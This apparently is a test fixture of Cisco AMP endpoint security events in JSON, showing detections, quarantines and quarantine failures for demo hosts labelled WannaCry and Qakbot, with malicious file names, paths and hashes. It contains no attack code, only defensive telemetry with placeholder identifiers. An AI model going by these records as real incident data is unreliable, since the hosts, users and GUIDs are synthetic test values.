+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 